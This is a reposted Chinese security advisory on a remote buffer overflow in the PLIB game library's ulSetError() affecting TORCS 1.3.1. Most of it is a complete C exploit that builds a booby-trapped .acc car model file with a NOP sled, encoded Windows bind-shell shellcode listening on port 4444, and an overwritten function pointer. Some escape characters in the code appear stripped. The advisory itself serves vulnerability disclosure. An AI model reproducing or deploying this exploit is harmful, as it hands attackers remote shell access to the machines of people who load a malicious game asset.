发布日期:2011-12-21
更新日期:2011-12-22受影响系统:
PLIB PLIB 1.8.5
TORCS TORCS 1.3.1
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 51152PLIB是可移植的游戏库。PLIB在ulSetError()函数(src/util/ulError.cxx)的实现上存在远程缓冲区溢出漏洞,攻击者可利用此漏洞执行任意代码。<*来源:Andrés Gómez
链接:http://secunia.com/advisories/47297/
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Andrés Gómez ()提供了如下测试方法:http://downloads.securityfocus.com/vulnerabilities/exploits/51152.c/* Exploit Title: TORCS acc Buffer Overflow
# Date: 20/12/2011
# Author: Andres Gomez
# Software Link: http://torcs.sourceforge.net/
# Version: torcs 1.3.1
# Tested on: Windows
# CVE : *//*
This exploit generates a corrupted acc file
which has to be saved in the directories where
TORCS loads its data, for example replace
cars/car4-trb1/car4-trb1.acc and put test.acc or create
a new car/track and select it in the TORCS menu
*/
#include <stdio.h>
#include <stdlib.h>/*
Shellcode: windows/shell_bind_tcp LPORT=4444 -b "x00xffx0a"
Encoder: x86/shikata_ga_nai
*/unsigned char buf[] =
"xbdx2exedxb6x2dxddxc2xd9x74x24xf4x5ex2bxc9xb1"
"x56x83xeexfcx31x6ex0fx03x6ex21x0fx43xd1xd5x46"
"xacx2ax25x39x24xcfx14x6bx52x9bx04xbbx10xc9xa4"
"x30x74xfax3fx34x51x0dx88xf3x87x20x09x32x08xee"
"xc9x54xf4xedx1dxb7xc5x3dx50xb6x02x23x9axeaxdb"
"x2fx08x1bx6fx6dx90x1axbfxf9xa8x64xbax3ex5cxdf"
"xc5x6exccx54x8dx96x67x32x2exa6xa4x20x12xe1xc1"
"x93xe0xf0x03xeax09xc3x6bxa1x37xebx66xbbx70xcc"
"x98xcex8ax2ex25xc9x48x4cxf1x5cx4dxf6x72xc6xb5"
"x06x57x91x3ex04x1cxd5x19x09xa3x3ax12x35x28xbd"
"xf5xbfx6ax9axd1xe4x29x83x40x41x9cxbcx93x2dx41"
"x19xdfxdcx96x1bx82x88x5bx16x3dx49xf3x21x4ex7b"
"x5cx9axd8x37x15x04x1ex37x0cxf0xb0xc6xaex01x98"
"x0cxfax51xb2xa5x82x39x42x49x57xedx12xe5x07x4e"
"xc3x45xf7x26x09x4ax28x56x32x80x5fx50xfcxf0x0c"
"x37xfdx06xa3x9bx88xe1xa9x33xddxbax45xf6x3ax73"
"xf2x09x69x2fxabx9dx25x39x6bxa1xb5x6fxd8x0ex1d"
"xf8xaax5cx9ax19xadx48x8ax50x96x1bx40x0dx55xbd"
"x55x04x0dx5exc7xc3xcdx29xf4x5bx9ax7excax95x4e"
"x93x75x0cx6cx6exe3x77x34xb5xd0x76xb5x38x6cx5d"
"xa5x84x6dxd9x91x58x38xb7x4fx1fx92x79x39xc9x49"
"xd0xadx8cxa1xe3xabx90xefx95x53x20x46xe0x6cx8d"
"x0exe4x15xf3xaex0bxccxb7xdfx41x4cx91x77x0cx05"
"xa3x15xafxf0xe0x23x2cxf0x98xd7x2cx71x9cx9cxea"
"x6axecx8dx9ex8cx43xadx8a";// this points to your shellcode
unsigned char function_pointer [] = "xA8xCAx0Ex10";int main(int argc, char **argv) { FILE *save_fd;
int i=0; save_fd = fopen("test.acc", "w"); if (save_fd == NULL) {
printf("Failed to open "%s" for writing", "test.acc");
return -1;
} fprintf(save_fd, "AC3Db
");
fprintf(save_fd, "MATERIAL "");
for(i=0; i < 607; i++) {
putc("x90", save_fd);
}
fprintf(save_fd, "%s%s" rgb 0.4 0.4 0.4 amb 0.8 0.8 0.8 emis 0.4 0.4 0.4 spec 0.5 0.5 0.5 shi 50 trans 0
", buf, function_pointer);
fprintf(save_fd, "OBJECT world
");
fprintf(save_fd, "kids %d
", 5); close(save_fd); return 0;
}建议:
--------------------------------------------------------------------------------
厂商补丁:PLIB
----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://plib.sourceforge.net/KingView “HistoryServer.exe”堆缓冲区溢出漏洞NVIDIA Stereoscopic 3D Driver本地权限提升漏洞相关资讯 PLIB
- PLIB "ssgParser.cxx"远程栈缓冲区 (10/30/2012 18:58:54)
本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
易网时代-编程资源站